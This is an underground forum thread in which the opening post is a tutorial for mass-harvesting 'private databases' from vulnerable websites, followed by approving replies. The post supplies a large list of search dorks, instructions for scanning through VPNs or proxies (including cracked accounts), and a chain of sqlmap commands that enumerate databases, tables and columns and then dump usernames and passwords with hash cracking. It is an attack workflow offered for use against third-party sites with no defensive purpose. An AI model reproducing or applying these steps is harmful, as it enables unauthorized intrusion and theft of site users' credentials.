ForlaxPy 156 Preface: [align=center] I have been into DB hacking for quite a while now and always struggled finding new and private databases to get good hits from. I spoke with some very HQ members of this community which were able to expand my knowledge a lot. I planned on selling this as an E-Book but after all everyone should have access to private databases as long as they are part of this community !You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away! Okay now enough of this BS and lets get started! [/align] [hide] [align=center]1. Python 2.7 + click + 2. SQLmap + click + 3. SQLiDumper + click +[/align] [align=center]4. VPN Accounts (Check Accounts Section) [Hide My Ass works best) 5* . RDP / VPS * not needed but helpfull __________________________________________________________________________________________ Let's get started: 1. Create a new Folder called "DB Hacking" or something along these lines. (Why? -> Else you might loose the overview) 2. Download and install Python 2.7.XXX. Remember to add Python to your system path (Should look like this) 3. Download SQLiDumper 8.3 and add it into your folder. Folder: DB Hacking ∟ SQLi Dumper 8.3 3. Download the newest sqlmap version and also add it into your folder. Folder: DB Hacking ∟ SQLi Dumper 8.3 ∟ sqlmapproject-xx 3. Go get yourself some dorks. You dont know how? + click + Or just use mine (These wont give you private DBs as other ppl can use them too) profilefree.php?companyid= art.php?content= OnlineGames.asp?serieId= show-patch.asp?uid= dettaglio-referenza.asp?id= coursedetail.html?id= event_detail.asp?ev_id= shop-item.php?id= buynow.aspx?posid= donation_search.php?f_school_id= location_detail.php?idlocation= detalle.php?rec_id= actividades_unidade.asp?cod_unidade= detalle.php?palabra= special-price.html?size= home.php?nav= testimonios.php?id= navsource.html?page_id= healthandsafety.php?Action= categories.asp?cid= dispnews.php?idw= training_detail.php?id= custom_page.asp?id= salelisting_new.asp?desc= shopnames.php?letter= division.asp?Id= ShowCat.aspx?secId= search.asp?strsearchtype= news-detail.php?news= default.asp?brandcode= show_category.aspx?ParentCategoryID= productlist.asp?categoryname= index.asp?k= IND_interiorSecciones.php?s= member-benefits.php?mod= rubrique.php?id_rub= wpdocumentdisplay.aspx?contentid= photo.asp?mmum= pagegallery.php?pgid= taxicard_type.php?type_id= print_list.php?id= kwsearch.php?word= specifications-gallery.php?gallery= ItemDetails.aspx?ItemID= produits.php?docid= pool.asp?hdnContent= calendar_details.asp?xid= s_noticias.asp?id= ethnobotany.php?sterm= consulta_main.php?id_imovel= productlist.aspx?attributetype= get_product.php?productid= detail_en.asp?newsid= dormire-bere-mangiare-san-vincenzo-scheda.php?id= spotsspecies.php?s_specie_id= Energize.php?cate= productss_en.asp?bigclassid= article.php?fid= scheda_articolo.php?id= downloadcatsearch.asp?cat= star-bar.php?pid= EventListing.asp?id= actiuni_prezentare.php?idx= ADDetail.asp?ID= detailproduct.php?id= knowledge_base.php?issue= detail.php?id_product= start.asp?productid= licence.php?lang= gru_en.php?id= jobsearch.aspx?lang= elook_anli.asp?id= childrens-publisher.php?src= movie.php?tvid= jerseys.php?jersey_id= departments.php?dept= search.php?username= cms.php?bf= buy-detail.php?nwid= index.asp?property_id= VendorDetail.aspx?vid= template_list.asp?code= BookDesc.asp?catId= ibm.asp?svpage= jugar.php?id= item_viewDesc.php?no= ResultPage.aspx?pi= page.asp?contentid= article_b.asp?id= customer_content.php?category_id= application.asp?groupid= eventview.php?cid= kategori.php?kategori= bulletin_board.asp?issue_id= review.php?listing_id= detalleNoticia.php?id_contenido= default.asp?ERROR_CODE= get_download.php?id= rtrd.php?sfm_from_iframe= interna.asp?Menu= link_detail.php?linksPage= property_list.php?county= searchcatalog.asp?PartID= article.htm?id= ProductDetails.php?brand_id= severdig_pub.php?Id= comunicacao-visual-produtos.php?categ= numerology_how_it_works.php?page= reader.php?objid= perfiles.php?id= chama_centro_paginas.php?pg= index.asp?configurar= hot_jobs.asp?artID= Discoveryontarget_Sponsor.aspx?id= noticias.asp?lingua= pettravelguide.php?pg= show.php?kat= greeting.aspx?format= pp.php?id= stilius.php?id= history.asp?pageguid= 4. Open SQLi Dumper 8.3 and paste your Dorks (You can now choose between using HMA 2.8.24.0 or proxies) How to use HMA: 1. Buy / Crack a premium Acc. 2. Download HMA 2.8.24.0 3. Put in you login Deatails and connect fot the first time Then reconnect your VPN and click Start Scanner > URLS only in SQLi Dumper How to use Proxies: Go to www.socks24.org and download the newest proxy-list. In SQLiDumper go to Tools & Settings -> Proxy And paste all your downloaded proxies into the SOCKS5 4 column and Test them And paste all your downloaded proxies into the SOCKS5 4 column and Test them It will take about 20 mins to check them all. ...wait untill all are checked... Click ok. Now from the Dropdown choose SOCKS5 4 Protocoll. 5. Start Checking the dorks. This proccess will take a while and that why I recommend using a RDP / VPS but you can do it on your main PC too. After a few hrs you should have around 20k URLs and now can start checking them by canceling the Online Scanner. So switch to the exploitables tab and click < Start Scanner > Wait for them to be checked completely. Now go to the next Tab "Injectables" and start this as well. You will notice that most of the URLs are Non-Injectable (But these are what we are here for). 6. "Injecting the Non-Injectables" <- lmao sounds like a movie Go to the Non-Injectables Tab and CTRL+A > Right click > Clipboard Go into your sqlmap folder and create a urls.txt Folder: DB Hacking ∟ SQLi Dumper 8.3 ∟ sqlmapproject-xx ∟ urls.txt Paste all your Non-Inkectables in there. Now Shift + Right Mouse > Open cmd/powershell here Now for the important command: sqlmap.py -m "urls.txt" --random-agent -f --batch -o --tables --output-dir=OUTPUT This command will now use the newest injections available and print out all the databases which are injectable. You can always check which sites have already been tested by taking a look into the "OUTPUT" folder There will be a lot of folders in the OUTPUT directory. As some are still Non-Injectable I wrote a script to only keep the ones that are: Download https://www.file-upload.net/download-13433178/Cleaner.py.html Run the file and you will be left with all folders containing a vulnerable Database. Now go back into the sqlmap folder and open the cmd/powershell again. Choose a folder from your output dir and open the target.txt Copy the URL in there. Now in your cmd type: sqlmap.py -u "yoururl" --batch --dbs --output-dir=OUTPUT This will give you a list of the DBs: Now choose a DB which sounds like it would include the user:pass and type: sqlmap.py -u "yoururl" --batch -D "Database Name" --tables --output-dir=OUTPUT Now you have all table look for one like "users/ registration/ login..." and type: sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" --columns --output-dir=OUTPUT If you found the information you are looking for type: sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" -C "Columns (example: username, pass)" --dump --eta --threads=5 --output-dir=OUTPUT This will now dump the columns and give you an ETA of when they are done. Sometimes the passwords are encrypted and need to be dehased which sqlmap does automatically. Its really fast and easy. So have fun getting your private databases and show me some hits u got below.[/align] [align=center]Don't Forget to leave a Like if you found this helpful! [/align] [/hide] Quote Share this post Link to post Share on other sites
mesvak 351 "I spoke with some very HQ members of this community" think I was one of em wasn't i Quote Share this post Link to post Share on other sites
Ragnarok 21 Well done, it is nice to have fresh method on how to dump some new databases. Appreciate :) Quote Share this post Link to post Share on other sites
Tana Allen 70 i would love to try it out and like you <3 Quote Share this post Link to post Share on other sites
vasya45 19 i would love to try it out and like you Quote Share this post Link to post Share on other sites
Madara000007 0 omg i was searching for this for a long time , thanks a lot boss Quote Share this post Link to post Share on other sites
fxxxxxx21 0 eyvallah cok teşekürler ederim saolsıun Quote Share this post Link to post Share on other sites
ZebzterXXZ 17 Preface: [align=center] I have been into DB hacking for quite a while now and always struggled finding new and private databases to get good hits from. I spoke with some very HQ members of this community which were able to expand my knowledge a lot. I planned on selling this as an E-Book but after all everyone should have access to private databases as long as they are part of this community !You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away! Okay now enough of this BS and lets get started! [/align] LIKED! Quote Share this post Link to post Share on other sites
MasterhaX 0 thank you so much for sharing this! <3 Quote Share this post Link to post Share on other sites
AETERNUS 7 Preface: [align=center] I have been into DB hacking for quite a while now and always struggled finding new and private databases to get good hits from. I spoke with some very HQ members of this community which were able to expand my knowledge a lot. I planned on selling this as an E-Book but after all everyone should have access to private databases as long as they are part of this community !You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away! Okay now enough of this BS and lets get started! [/align] LInux or windows needed? Quote Share this post Link to post Share on other sites
picklelover404 1 thanks for the share bro. I've been looking for new ways to dump DB Quote Share this post Link to post Share on other sites
aa123123 1 I spoke with some very HQ members of this coI spoke with some very HQ members of this co Quote Share this post Link to post Share on other sites
